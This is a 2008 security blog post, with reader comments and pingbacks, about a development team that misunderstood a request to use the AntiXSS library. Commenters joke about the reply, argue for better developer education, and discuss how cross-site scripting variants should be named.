From the Office of "Real World Software Security"
When a customer development team was recently asked to use the AntiXSS library, validate input and encode output for their web interface they replied (and I quote) “we do not use cross site scripting”.
If any customer ever asks the single most effective thing to affect a positive change on their software security security program I always respond with education and awareness. Pound for pound, dollar for dollar it is the most effective tool anyone has.
January 10, 2008 at 5:55 pm
Wow… just… wow.
“You should use a safe at your bank to secure your money from thieves”
“oh, we don’t steal money so we don’t need a safe”
January 10, 2008 at 6:08 pm
Later that day…
“Bill did you install the anti-virus software?”
“No need Fred, we do not use viruses.”
January 10, 2008 at 7:19 pm
That is great stuff! I have heard some pretty crazy things while talking to folks about software security, running training classes and such. That is a keeper.
I was hoping that the industry was finally getting to the point where most software developers knew about SQL injection and Cross Site Scripting so that we could finally move on to more interesting problems, but I guess that is not the case.
Until basic software security education gets pushed down to the University level, though, I don’t suppose we should expect to see that kind of sea change. Oh - and “How to Program” books probably need to stop using examples with security issues…
–Dan
January 10, 2008 at 9:34 pm
no– don’t secure coding in the “how to program books”… you can make more money by selling “Now that you can program, program with security” and sell 2 books instead of 1.
January 11, 2008 at 10:49 pm
What scares me is how often this person (and others!) respond with such statements to more than just the question you asked. They might be the type that deny everything to do with insecurity. “We don’t use SQL servers.” “We don’t have vulnerable web servers.” “We don’t use dynamic websites.”
January 12, 2008 at 5:14 am
Cross-Site Scripting, as a term, is unnecessarily complex. It’s HTML Injection. Call it that, and a web developer will know what it is, how it happens, and how to prevent it.
January 12, 2008 at 8:51 am
I am just a native Englishman. Grammar fixed guvnor.
January 12, 2008 at 9:09 pm
@ Alun Jones:
Well, not really. Stored-XSS and HTML Injection are the same thing. Reflected-XSS is more like a few things, some of which include: parameter/form-based/cookie tampering in the HTTP header to include a script that will execute code on the client-side, while no code is executed or injected on the server-side. Reflected-XSS also includes script code inside binaries or in other places (e.g. Flash/QuickTime/media files, or images, or cache files) besides just HTTP header injections. DOM-based XSS is XSS on the client-side DOM (Javascript injected Javascript)!
I do think we’re going to need to start redefining XSS. Many XSS tools today only look for Javascript. But there are also other languages, including VBScript, Applescript, Actionscript, Silverlight (and other RIA frameworks) — and most evil of all — HTML, XHTML, CSS, XML, etc.
January 13, 2008 at 9:02 am
[...] lo que me ha llevado a escribir este post, es la entrada From the Office of “Real World Software Security” en la que tras recomendarle a un cliente utilizar una librería antiXSS el cliente [...]
January 15, 2008 at 1:07 pm
[...] From the Office of “Real World Software Security” [...]
January 16, 2008 at 12:48 am
Is this the same as no accountability. Dont fix it till we get in trouble?
Sad.
January 19, 2008 at 6:45 am
[...] nearly as much as it should. With all the other "low hanging fruit", and with examples of cluelessness like this, we’ll probably see more stories of domain/email/bank accounts/stock trades being [...]
February 22, 2008 at 11:17 am
[...] Wednesday Mark Curphey emailed me about a conversation his team had with a customer. I see he has now blogged about the conversation. Here’s an excerpt. When a customers [sic, you need to learn some [...]
February 23, 2008 at 10:12 pm
[...] Wednesday Mark Curphey emailed me about a conversation his team had with a customer. I see he has now blogged about the conversation. Here’s an excerpt. When a customers [sic, you need to learn some [...]
February 26, 2008 at 8:15 pm
[...] Wednesday Mark Curphey emailed me about a conversation his team had with a customer. I see he has now blogged about the conversation. Here’s an excerpt. When a customers [sic, you need to learn some [...]
March 2, 2008 at 5:37 pm
[...] du post de Mark Curphey : “ When a customer development team was recently asked to use the AntiXSS library, validate [...]